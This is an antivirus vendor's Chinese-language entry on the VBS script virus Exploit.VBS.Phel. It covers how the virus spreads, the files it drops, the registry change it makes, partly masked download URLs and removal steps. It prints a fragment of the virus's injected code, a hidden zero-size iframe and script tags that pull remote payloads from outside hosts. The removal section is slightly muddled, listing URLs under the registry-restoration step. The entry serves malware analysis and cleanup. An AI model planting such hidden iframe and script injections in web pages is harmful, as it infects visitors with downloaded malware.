病毒标签
病毒名称: Exploit.VBS.Phel
文件 MD5: 49B21DC7A8FDEE131119598E37E39DFA
公开范围: 完全公开
危害等级: 中
文件长度: 3,284 字节
感染系统: windows98以上版本
开发工具: VB Script
加壳类型: 无
命名对照: Symentec[无]
Mcafee[Exploit-ObscuredHtml]
病毒描述
该病毒属VBS脚本病毒,病毒运行后,联接网络,下载病毒文件到系统临时文件夹,修改注册表。该病毒通过mail附件、局域网共享、IRC聊天通道及感染htm、asp、jsp、php等网页文件传播。该病毒对用户有一定危害。
行为分析-本地行为
1、病毒运行后,下载病毒文件到系统临时文件夹:
%Documents and Settings%用户名Local SettingsTempnolove.gif
%Documents and Settings%用户名Local SettingsTempa.asp
2、修改注册表项:
HKEY_CURRENT_USERSoftwareMicrosoftInternet ExplorerMain
键值: 字串: "NotifyDownloadComplete "="yes"
3、联接网络:
http://www.xuemu****.com/nolove.gif
http://www.sin***.com/shin/inc/a.asp
4、该病毒部分代码为:
<iframe src="http://www.sin***.com/shin/inc/a.asp"width="0"height="0">
<SCRIPT language=JScriptsrc=http://www.xuemu****.com/nolove.gif"+String.fromCharCode(62)+">
<SCRIPT language=VScript src=http://tech.ddvip.com/2008-11/"nolove.gif">
</SCRIPT><SCRIPTlang uage=VScript src=http://tech.ddvip.com/2008-11/"nolove.pif">
注:%Documents and Settings%是一个可变路径。病毒通过查询操作系统来决定当前System文件夹的位置。Windows操作系统中默认的安装路径是C: Documents and Settings。
--------------------------------------------------------------------------------
清除方案
1 、使用安天木马防线可彻底清除此病毒(推荐)。
2、手工清除请按照行为分析删除对应文件,恢复相关系统设置。
(1) 使用安天木马防线“进程管理”关闭病毒进程
(2) 删除病毒文件
%Documents and Settings%用户名Local SettingsTempnolove.gif
%Documents and Settings%用户名Local SettingsTempa.asp
(3) 恢复病毒修改的注册表项目,删除病毒添加的注册表项
http://www.xuemu****.com/nolove.gif
http://www.sin***.com/shin/inc/a.asp
版权与免责声明
1、本站所发布的文章仅供技术交流参考,本站不主张将其做为决策的依据,浏览者可自愿选择采信与否,本站不对因采信这些信息所产生的任何问题负责。
2、本站部分文章来源于网络,其版权为原权利人所有。由于来源之故,有的文章未能获得作者姓名,署“未知”或“佚名”。对于这些文章,有知悉作者姓名的请告知本站,以便及时署名。如果作者要求删除,我们将予以删除。除此之外本站不再承担其它责任。
3、本站部分文章来源于本站原创,本站拥有所有权利。
4、如对本站发布的信息有异议,请联系我们,经本站确认后,将在三个工作日内做出修改或删除处理。
请参阅权责声明!